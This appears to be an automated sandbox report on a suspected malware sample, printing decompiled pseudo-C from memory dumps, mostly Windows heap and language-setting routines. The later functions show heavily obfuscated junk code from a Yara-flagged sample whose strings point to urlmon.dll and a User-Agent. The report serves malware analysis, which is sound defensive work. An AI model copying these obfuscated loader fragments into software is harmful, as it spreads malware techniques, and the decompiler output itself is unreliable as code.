                                  • <unknown>, xrefs: 01A6B27E, 01A6B2D1, 01A6B350, 01A6B399, 01A6B417, 01A6B48E
                                  • The resource is owned exclusively by thread %p, xrefs: 01A6B374
                                  • The instruction at %p referenced memory at %p., xrefs: 01A6B432
                                  • The instruction at %p tried to %s , xrefs: 01A6B4B6
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A6B53F
                                  • *** Inpage error in %ws:%s, xrefs: 01A6B418
                                  • The critical section is owned by thread %p., xrefs: 01A6B3B9
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01A6B2F3
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A6B314
                                  • *** enter .cxr %p for the context, xrefs: 01A6B50D
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A6B3D6
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A6B484
                                  • *** enter .exr %p for the exception record, xrefs: 01A6B4F1
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A6B305
                                  • This failed because of error %Ix., xrefs: 01A6B446
                                  • The resource is owned shared by %d threads, xrefs: 01A6B37E
                                  • *** then kb to get the faulting stack, xrefs: 01A6B51C
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A6B2DC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: 74e8d8c09387ae45d817180364dd580062d36c5a89bacbdafec6e876159000fe
                                  • Instruction ID: 70b07211398b18a29347a66512345b1929fd11aec028673fbcd9aef0b9ef373c
                                  • Opcode Fuzzy Hash: 74e8d8c09387ae45d817180364dd580062d36c5a89bacbdafec6e876159000fe
                                  • Instruction Fuzzy Hash: 79811675B40210FFDB22AB5ACC49DBB3F79EF96A51F840058F608AB912D3618542C7F2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E01A71C06() {
                                  				signed int _t27;
                                  				char* _t104;
                                  				char* _t105;
                                  				intOrPtr _t113;
                                  				intOrPtr _t115;
                                  				intOrPtr _t117;
                                  				intOrPtr _t119;
                                  				intOrPtr _t120;
                                  
                                  				_t105 = 0x19948a4;
                                  				_t104 = "HEAP: ";
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E019BB150();
                                  				} else {
                                  					E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				_push( *0x1aa589c);
                                  				E019BB150("Heap error detected at %p (heap handle %p)\n",  *0x1aa58a0);
                                  				_t27 =  *0x1aa5898; // 0x0
                                  				if(_t27 <= 0xf) {
                                  					switch( *((intOrPtr*)(_t27 * 4 +  &M01A71E96))) {
                                  						case 0:
                                  							_t105 = "heap_failure_internal";
                                  							goto L21;
                                  						case 1:
                                  							goto L21;
                                  						case 2:
                                  							goto L21;
                                  						case 3:
                                  							goto L21;
                                  						case 4:
                                  							goto L21;
                                  						case 5:
                                  							goto L21;
                                  						case 6:
                                  							goto L21;
                                  						case 7:
                                  							goto L21;
                                  						case 8:
                                  							goto L21;
                                  						case 9:
                                  							goto L21;
                                  						case 0xa:
                                  							goto L21;
                                  						case 0xb:
                                  							goto L21;
                                  						case 0xc:
                                  							goto L21;
                                  						case 0xd:
                                  							goto L21;
                                  						case 0xe:
                                  							goto L21;
                                  						case 0xf:
                                  							goto L21;
                                  					}
                                  				}
                                  				L21:
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E019BB150();
                                  				} else {
                                  					E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				_push(_t105);
                                  				E019BB150("Error code: %d - %s\n",  *0x1aa5898);
                                  				_t113 =  *0x1aa58a4; // 0x0
                                  				if(_t113 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E019BB150();
                                  					} else {
                                  						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E019BB150("Parameter1: %p\n",  *0x1aa58a4);
                                  				}
                                  				_t115 =  *0x1aa58a8; // 0x0
                                  				if(_t115 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E019BB150();
                                  					} else {
                                  						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E019BB150("Parameter2: %p\n",  *0x1aa58a8);
                                  				}
                                  				_t117 =  *0x1aa58ac; // 0x0
                                  				if(_t117 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E019BB150();
                                  					} else {
                                  						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E019BB150("Parameter3: %p\n",  *0x1aa58ac);
                                  				}
                                  				_t119 =  *0x1aa58b0; // 0x0
                                  				if(_t119 != 0) {
                                  					L41:
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E019BB150();
                                  					} else {
                                  						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					_push( *0x1aa58b4);
                                  					E019BB150("Last known valid blocks: before - %p, after - %p\n",  *0x1aa58b0);
                                  				} else {
                                  					_t120 =  *0x1aa58b4; // 0x0
                                  					if(_t120 != 0) {
                                  						goto L41;
                                  					}
                                  				}
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E019BB150();
                                  				} else {
                                  					E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				return E019BB150("Stack trace available at %p\n", 0x1aa58c0);
                                  			}












                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                  • API String ID: 0-2897834094
                                  • Opcode ID: 93ddb86ab61ee50e5b48433dbfb5ae4be00c8e6ce630ebd60feadc74d1938e12
                                  • Instruction ID: 32d60d57f8878fa27172e11a06dba1ac093bae226a1a32b3d0214486a2a0fe5a
                                  • Opcode Fuzzy Hash: 93ddb86ab61ee50e5b48433dbfb5ae4be00c8e6ce630ebd60feadc74d1938e12
                                  • Instruction Fuzzy Hash: 4161E136921246DFD722AB89D984E34B3F8FB44920B8D842AF50E5B341D6249D458F9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E019C3D34(signed int* __ecx) {
                                  				signed int* _v8;
                                  				char _v12;
                                  				signed int* _v16;
                                  				signed int* _v20;
                                  				char _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int* _v48;
                                  				signed int* _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				char _v68;
                                  				signed int _t140;
                                  				signed int _t161;
                                  				signed int* _t236;
                                  				signed int* _t242;
                                  				signed int* _t243;
                                  				signed int* _t244;
                                  				signed int* _t245;
                                  				signed int _t255;
                                  				void* _t257;
                                  				signed int _t260;
                                  				void* _t262;
                                  				signed int _t264;
                                  				void* _t267;
                                  				signed int _t275;
                                  				signed int* _t276;
                                  				short* _t277;
                                  				signed int* _t278;
                                  				signed int* _t279;
                                  				signed int* _t280;
                                  				short* _t281;
                                  				signed int* _t282;
                                  				short* _t283;
                                  				signed int* _t284;
                                  				void* _t285;
                                  
                                  				_v60 = _v60 | 0xffffffff;
                                  				_t280 = 0;
                                  				_t242 = __ecx;
                                  				_v52 = __ecx;
                                  				_v8 = 0;
                                  				_v20 = 0;
                                  				_v40 = 0;
                                  				_v28 = 0;
                                  				_v32 = 0;
                                  				_v44 = 0;
                                  				_v56 = 0;
                                  				_t275 = 0;
                                  				_v16 = 0;
                                  				if(__ecx == 0) {
                                  					_t280 = 0xc000000d;
                                  					_t140 = 0;
                                  					L50:
                                  					 *_t242 =  *_t242 | 0x00000800;
                                  					_t242[0x13] = _t140;
                                  					_t242[0x16] = _v40;
                                  					_t242[0x18] = _v28;
                                  					_t242[0x14] = _v32;
                                  					_t242[0x17] = _t275;
                                  					_t242[0x15] = _v44;
                                  					_t242[0x11] = _v56;
                                  					_t242[0x12] = _v60;
                                  					return _t280;
                                  				}
                                  				if(E019C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                  					_v56 = 1;
                                  					if(_v8 != 0) {
                                  						L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                  					}
                                  					_v8 = _t280;
                                  				}
                                  				if(E019C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                  					_v60 =  *_v8;
                                  					L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                  					_v8 = _t280;
                                  				}
                                  				if(E019C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                  					L16:
                                  					if(E019C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                  						L28:
                                  						if(E019C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                  							L46:
                                  							_t275 = _v16;
                                  							L47:
                                  							_t161 = 0;
                                  							L48:
                                  							if(_v8 != 0) {
                                  								L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                  							}
                                  							_t140 = _v20;
                                  							if(_t140 != 0) {
                                  								if(_t275 != 0) {
                                  									L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                  									_t275 = 0;
                                  									_v28 = 0;
                                  									_t140 = _v20;
                                  								}
                                  							}
                                  							goto L50;
                                  						}
                                  						_t167 = _v12;
                                  						_t255 = _v12 + 4;
                                  						_v44 = _t255;
                                  						if(_t255 == 0) {
                                  							_t276 = _t280;
                                  							_v32 = _t280;
                                  						} else {
                                  							_t276 = L019D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                  							_t167 = _v12;
                                  							_v32 = _t276;
                                  						}
                                  						if(_t276 == 0) {
                                  							_v44 = _t280;
                                  							_t280 = 0xc0000017;
                                  							goto L46;
                                  						} else {
                                  							E019FF3E0(_t276, _v8, _t167);
                                  							_v48 = _t276;
                                  							_t277 = E01A01370(_t276, 0x1994e90);
                                  							_pop(_t257);
                                  							if(_t277 == 0) {
                                  								L38:
                                  								_t170 = _v48;
                                  								if( *_v48 != 0) {
                                  									E019FBB40(0,  &_v68, _t170);
                                  									if(L019C43C0( &_v68,  &_v24) != 0) {
                                  										_t280 =  &(_t280[0]);
                                  									}
                                  								}
                                  								if(_t280 == 0) {
                                  									_t280 = 0;
                                  									L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                  									_v44 = 0;
                                  									_v32 = 0;
                                  								} else {
                                  									_t280 = 0;
                                  								}
                                  								_t174 = _v8;
                                  								if(_v8 != 0) {
                                  									L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                  								}
                                  								_v8 = _t280;
                                  								goto L46;
                                  							}
                                  							_t243 = _v48;
                                  							do {
                                  								 *_t277 = 0;
                                  								_t278 = _t277 + 2;
                                  								E019FBB40(_t257,  &_v68, _t243);
                                  								if(L019C43C0( &_v68,  &_v24) != 0) {
                                  									_t280 =  &(_t280[0]);
                                  								}
                                  								_t243 = _t278;
                                  								_t277 = E01A01370(_t278, 0x1994e90);
                                  								_pop(_t257);
                                  							} while (_t277 != 0);
                                  							_v48 = _t243;
                                  							_t242 = _v52;
                                  							goto L38;
                                  						}
                                  					}
                                  					_t191 = _v12;
                                  					_t260 = _v12 + 4;
                                  					_v28 = _t260;
                                  					if(_t260 == 0) {
                                  						_t275 = _t280;
                                  						_v16 = _t280;
                                  					} else {
                                  						_t275 = L019D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                  						_t191 = _v12;
                                  						_v16 = _t275;
                                  					}
                                  					if(_t275 == 0) {
                                  						_v28 = _t280;
                                  						_t280 = 0xc0000017;
                                  						goto L47;
                                  					} else {
                                  						E019FF3E0(_t275, _v8, _t191);
                                  						_t285 = _t285 + 0xc;
                                  						_v48 = _t275;
                                  						_t279 = _t280;
                                  						_t281 = E01A01370(_v16, 0x1994e90);
                                  						_pop(_t262);
                                  						if(_t281 != 0) {
                                  							_t244 = _v48;
                                  							do {
                                  								 *_t281 = 0;
                                  								_t282 = _t281 + 2;
                                  								E019FBB40(_t262,  &_v68, _t244);
                                  								if(L019C43C0( &_v68,  &_v24) != 0) {
                                  									_t279 =  &(_t279[0]);
                                  								}
                                  								_t244 = _t282;
                                  								_t281 = E01A01370(_t282, 0x1994e90);
                                  								_pop(_t262);
                                  							} while (_t281 != 0);
                                  							_v48 = _t244;
                                  							_t242 = _v52;
                                  						}
                                  						_t201 = _v48;
                                  						_t280 = 0;
                                  						if( *_v48 != 0) {
                                  							E019FBB40(_t262,  &_v68, _t201);
                                  							if(L019C43C0( &_v68,  &_v24) != 0) {
                                  								_t279 =  &(_t279[0]);
                                  							}
                                  						}
                                  						if(_t279 == 0) {
                                  							L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                  							_v28 = _t280;
                                  							_v16 = _t280;
                                  						}
                                  						_t202 = _v8;
                                  						if(_v8 != 0) {
                                  							L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                  						}
                                  						_v8 = _t280;
                                  						goto L28;
                                  					}
                                  				}
                                  				_t214 = _v12;
                                  				_t264 = _v12 + 4;
                                  				_v40 = _t264;
                                  				if(_t264 == 0) {
                                  					_v20 = _t280;
                                  				} else {
                                  					_t236 = L019D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                  					_t280 = _t236;
                                  					_v20 = _t236;
                                  					_t214 = _v12;
                                  				}
                                  				if(_t280 == 0) {
                                  					_t161 = 0;
                                  					_t280 = 0xc0000017;
                                  					_v40 = 0;
                                  					goto L48;
                                  				} else {
                                  					E019FF3E0(_t280, _v8, _t214);
                                  					_t285 = _t285 + 0xc;
                                  					_v48 = _t280;
                                  					_t283 = E01A01370(_t280, 0x1994e90);
                                  					_pop(_t267);
                                  					if(_t283 != 0) {
                                  						_t245 = _v48;
                                  						do {
                                  							 *_t283 = 0;
                                  							_t284 = _t283 + 2;
                                  							E019FBB40(_t267,  &_v68, _t245);
                                  							if(L019C43C0( &_v68,  &_v24) != 0) {
                                  								_t275 = _t275 + 1;
                                  							}
                                  							_t245 = _t284;
                                  							_t283 = E01A01370(_t284, 0x1994e90);
                                  							_pop(_t267);
                                  						} while (_t283 != 0);
                                  						_v48 = _t245;
                                  						_t242 = _v52;
                                  					}
                                  					_t224 = _v48;
                                  					_t280 = 0;
                                  					if( *_v48 != 0) {
                                  						E019FBB40(_t267,  &_v68, _t224);
                                  						if(L019C43C0( &_v68,  &_v24) != 0) {
                                  							_t275 = _t275 + 1;
                                  						}
                                  					}
                                  					if(_t275 == 0) {
                                  						L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                  						_v40 = _t280;
                                  						_v20 = _t280;
                                  					}
                                  					_t225 = _v8;
                                  					if(_v8 != 0) {
                                  						L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                  					}
                                  					_v8 = _t280;
                                  					goto L16;
                                  				}
                                  			}

                                  Strings
                                  • Kernel-MUI-Language-SKU, xrefs: 019C3F70
                                  • WindowsExcludedProcs, xrefs: 019C3D6F
                                  • Kernel-MUI-Number-Allowed, xrefs: 019C3D8C
                                  • Kernel-MUI-Language-Disallowed, xrefs: 019C3E97
                                  • Kernel-MUI-Language-Allowed, xrefs: 019C3DC0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: c122317fd07f48f1cedd3774359a488c57ab4b5269fa242400735d91e5b1ff2f
                                  • Instruction ID: d84ae6927ebe6eef34e035f7c2e576663b9541f722821cfadc313cafeb52379d
                                  • Opcode Fuzzy Hash: c122317fd07f48f1cedd3774359a488c57ab4b5269fa242400735d91e5b1ff2f
                                  • Instruction Fuzzy Hash: ACF15E72D00219EFCF16DF98C980EEEBBB9FF48A50F15446AE549A7210D7349E01CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E004157D8(signed int __eax, void* __ecx, signed int __edx, void* __fp0) {
                                  				signed int _t36;
                                  				signed int _t41;
                                  				signed char _t43;
                                  				signed char _t48;
                                  				signed char _t49;
                                  				signed char _t51;
                                  				void* _t55;
                                  				signed char _t60;
                                  				signed int _t61;
                                  				signed int _t66;
                                  				void* _t73;
                                  
                                  				_t55 = __ecx;
                                  				if((__edx &  *(_t73 + __ecx + 0x26)) == 0) {
                                  					_t36 = __eax ^ 0x542b733e;
                                  					__eflags = _t36;
                                  					if(__eflags >= 0) {
                                  						_push(_t66);
                                  						__eflags = 0;
                                  						_push(_t60);
                                  						_t61 =  *(_t73 + 0xc);
                                  						 *((intOrPtr*)(_t73 - 0x19)) = 0;
                                  						 *((char*)(_t73 - 0x15)) = 0;
                                  						goto L27;
                                  					} else {
                                  						asm("adc dl, dl");
                                  						goto L22;
                                  					}
                                  				} else {
                                  					asm("les ebp, [ebx]");
                                  					_t17 = __eax;
                                  					__eax = __esp;
                                  					__esp = _t17;
                                  					__eflags = __al - 0xa4;
                                  					__al =  *0xa4cf642b;
                                  					asm("movsb");
                                  					__ah = 0xce;
                                  					__ebx = 0xc7707ee;
                                  					if(__eflags > 0) {
                                  						L27:
                                  						goto L29;
                                  					} else {
                                  						__esp = __esp + 1;
                                  						_push(__ecx);
                                  						__eax = __eax + 1;
                                  						__eflags = __eax;
                                  						asm("a16 add eax, 0xb69a140");
                                  						asm("scasw");
                                  						asm("ficomp word [ebp+0x13]");
                                  						if(__eflags == 0) {
                                  							while(1) {
                                  								L7:
                                  								asm("out 0x73, al");
                                  								while(__eflags > 0) {
                                  									__eflags = __eax & 0x9372fc31;
                                  									_t13 = __eax;
                                  									__eax = __edx;
                                  									__edx = _t13;
                                  									__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
                                  									__eflags = __bh;
                                  									__esp = __esp + 1;
                                  									_push(ds);
                                  									asm("adc [esi], cl");
                                  									_push(__ecx);
                                  									_push(__ecx);
                                  									asm("sti");
                                  									asm("faddp st1, st0");
                                  									if(__eflags > 0) {
                                  										continue;
                                  									} else {
                                  										asm("das");
                                  										if(__eflags < 0) {
                                  											L22:
                                  											asm("ror byte [ebx], cl");
                                  											_t43 = _t60;
                                  											_t61 = _t36;
                                  											_t23 = _t73 + 0x7f6cb721;
                                  											 *_t23 =  *(_t73 + 0x7f6cb721) + _t55;
                                  											__eflags =  *_t23;
                                  											goto L23;
                                  										} else {
                                  											_push(ss);
                                  											__bh = __bh |  *__ecx;
                                  											__eflags = __bh;
                                  											if(__eflags >= 0) {
                                  												goto L18;
                                  											} else {
                                  												asm("scasd");
                                  												 *0x529d6c8a = __eax;
                                  												__al = __al - 0xcc;
                                  												asm("cmpsd");
                                  												__eflags = __esp - __edi;
                                  												if(__eflags >= 0) {
                                  													_push(__ebx);
                                  													_push(__edi);
                                  													__ebx = __ebx + 1;
                                  													__ebx = __ebx - 1;
                                  													asm("enter 0x90ab, 0xfe");
                                  													asm("o16 jge 0x7e");
                                  													__dl = 0xe6;
                                  													__edx = __edx - 1;
                                  													__eflags = __edx;
                                  													_t5 = __edx - 0x618a279f;
                                  													_t6 = __ah;
                                  													__ah =  *_t5;
                                  													 *_t5 = _t6;
                                  												} else {
                                  													 *[cs:ebx+0x72fc0a61] = __dh;
                                  													asm("into");
                                  													asm("pushad");
                                  													_t15 = __eax - 0x6678bb3c;
                                  													_t16 = __dl;
                                  													__dl =  *_t15;
                                  													 *_t15 = _t16;
                                  													_pop(ss);
                                  													asm("enter 0x3aa, 0xa1");
                                  													asm("out dx, eax");
                                  												}
                                  												asm("popad");
                                  												__fp0 = __fp0 /  *(__ebp - 0x62);
                                  												__edx =  *(__esi + __edx * 8) * 0x3b;
                                  												__edx = __edx - 1;
                                  												__edi = 0xf5f30346;
                                  												__esi = __ebx;
                                  												asm("retf");
                                  												_t10 = __eax;
                                  												__eax = __ecx;
                                  												__ecx = _t10;
                                  												asm("int3");
                                  												goto L7;
                                  											}
                                  										}
                                  									}
                                  									goto L33;
                                  								}
                                  								_t3 = __ebp - 0x73;
                                  								 *_t3 =  *(__ebp - 0x73) << 0x56;
                                  								__eflags =  *_t3;
                                  							}
                                  						} else {
                                  							__bh = __bh + __al;
                                  							asm("adc al, 0xb1");
                                  							__dh = 0xa0;
                                  							asm("sbb cl, [esp+ecx*8+0x53]");
                                  							asm("repne mov esp, edi");
                                  							__al = __al ^ 0x0000006d;
                                  							asm("jecxz 0xffffffa7");
                                  							__ebx = 0x9a0bfea9;
                                  							asm("stc");
                                  							__edx = __eax * 0x9a0bfea9 >> 0x20;
                                  							__eflags = __eax;
                                  							L18:
                                  							L23:
                                  							if(__eflags > 0) {
                                  								 *_t43 =  *_t43 & _t43;
                                  								_push(ss);
                                  								 *((intOrPtr*)(_t43 + _t55 - 1)) =  *((intOrPtr*)(_t43 + _t55 - 1)) + _t43 + _t55 - 1;
                                  								_t33 = _t73 - 0x24; // 0x6d6c7275
                                  								__eflags =  *((intOrPtr*)(_t73 + 8)) + 0xc94;
                                  								_t66 = E00413E50( *((intOrPtr*)(_t73 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t73 + 8)) + 0xc94,  *((intOrPtr*)(_t73 + 8)) + 0xc94, _t33), 0, 0, 0x69767207);
                                  								L29:
                                  								asm("lock add esp, 0x28");
                                  								__eflags = _t66;
                                  								if(_t66 == 0) {
                                  									L32:
                                  									__eflags = 0;
                                  									return 0;
                                  								} else {
                                  									_t41 =  *_t66(0, E0041A390(_t61) + _t61, _t73 - 4);
                                  									__eflags = _t41;
                                  									if(_t41 != 0) {
                                  										goto L32;
                                  									} else {
                                  										return 1;
                                  									}
                                  								}
                                  							} else {
                                  								_t48 = _t51;
                                  								__eflags = _t48 & 0x69453e52;
                                  								asm("outsd");
                                  								_t49 = _t48 &  *(_t43 - 0x68);
                                  								__eflags = _t49;
                                  								asm("arpl [eax-0x19cfcce5], di");
                                  								asm("loopne 0x32");
                                  								return _t49;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L33:
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                                  • Instruction ID: d35fe0e56d5b213ec2a307e6804696366d35cc18aa5b3103ee1b1b76edd744e7
                                  • Opcode Fuzzy Hash: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                                  • Instruction Fuzzy Hash: 0741BC72805644EEDB01DE519D427EFBFB8EB85724F18001AEC00AB341D33D899687DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E004157AA(void* __eax, signed char __ebx, void* __ecx, void* __edx, signed char __edi, void* __esi, void* __eflags, void* __fp0) {
                                  				signed char _t26;
                                  				signed int _t34;
                                  				signed char _t36;
                                  				signed int _t37;
                                  				signed char _t39;
                                  				void* _t43;
                                  				void* _t48;
                                  				signed int _t56;
                                  				void* _t61;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					_t43 = __ecx;
                                  					_t39 = __ebx;
                                  					asm("das");
                                  					if(__eflags < 0) {
                                  						break;
                                  					}
                                  					L11:
                                  					_push(ss);
                                  					__bh = __bh |  *__ecx;
                                  					__eflags = __bh;
                                  					if(__eflags >= 0) {
                                  						L14:
                                  						L16:
                                  						if(__eflags > 0) {
                                  							L18:
                                  							 *_t26 =  *_t26 & _t26;
                                  							_push(ss);
                                  							 *((intOrPtr*)(_t26 + _t43 - 1)) =  *((intOrPtr*)(_t26 + _t43 - 1)) + _t26 + _t43 - 1;
                                  							_t23 = _t61 - 0x24; // 0x6d6c7275
                                  							__eflags =  *((intOrPtr*)(_t61 + 8)) + 0xc94;
                                  							_t56 = E00413E50( *((intOrPtr*)(_t61 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t61 + 8)) + 0xc94,  *((intOrPtr*)(_t61 + 8)) + 0xc94, _t23), 0, 0, 0x69767207);
                                  							L19:
                                  							asm("lock add esp, 0x28");
                                  							__eflags = _t56;
                                  							if(_t56 == 0) {
                                  								L22:
                                  								__eflags = 0;
                                  								return 0;
                                  							} else {
                                  								L20:
                                  								_t34 =  *_t56(0, E0041A390(_t48) + _t48, _t61 - 4);
                                  								__eflags = _t34;
                                  								if(_t34 != 0) {
                                  									goto L22;
                                  								} else {
                                  									L21:
                                  									return 1;
                                  								}
                                  							}
                                  						} else {
                                  							L17:
                                  							_t36 = _t39;
                                  							__eflags = _t36 & 0x69453e52;
                                  							asm("outsd");
                                  							_t37 = _t36 &  *(_t26 - 0x68);
                                  							__eflags = _t37;
                                  							asm("arpl [eax-0x19cfcce5], di");
                                  							asm("loopne 0x32");
                                  							return _t37;
                                  						}
                                  					} else {
                                  						L12:
                                  						asm("scasd");
                                  						 *0x529d6c8a = __eax;
                                  						__al = __al - 0xcc;
                                  						asm("cmpsd");
                                  						__eflags = __esp - __edi;
                                  						if(__eflags >= 0) {
                                  							_push(__ebx);
                                  							_push(__edi);
                                  							__ebx = __ebx + 1;
                                  							__ebx = __ebx - 1;
                                  							asm("enter 0x90ab, 0xfe");
                                  							asm("o16 jge 0x7e");
                                  							__dl = 0xe6;
                                  							__edx = __edx - 1;
                                  							__eflags = __edx;
                                  							_t3 = __edx - 0x618a279f;
                                  							_t4 = __ah;
                                  							__ah =  *_t3;
                                  							 *_t3 = _t4;
                                  						} else {
                                  							 *[cs:ebx+0x72fc0a61] = __dh;
                                  							asm("into");
                                  							asm("pushad");
                                  							_t13 = __eax - 0x6678bb3c;
                                  							_t14 = __dl;
                                  							__dl =  *_t13;
                                  							 *_t13 = _t14;
                                  							_pop(ss);
                                  							asm("enter 0x3aa, 0xa1");
                                  							asm("out dx, eax");
                                  						}
                                  						L5:
                                  						asm("popad");
                                  						__fp0 = __fp0 /  *(__ebp - 0x62);
                                  						__edx =  *(__esi + __edx * 8) * 0x3b;
                                  						__edx = __edx - 1;
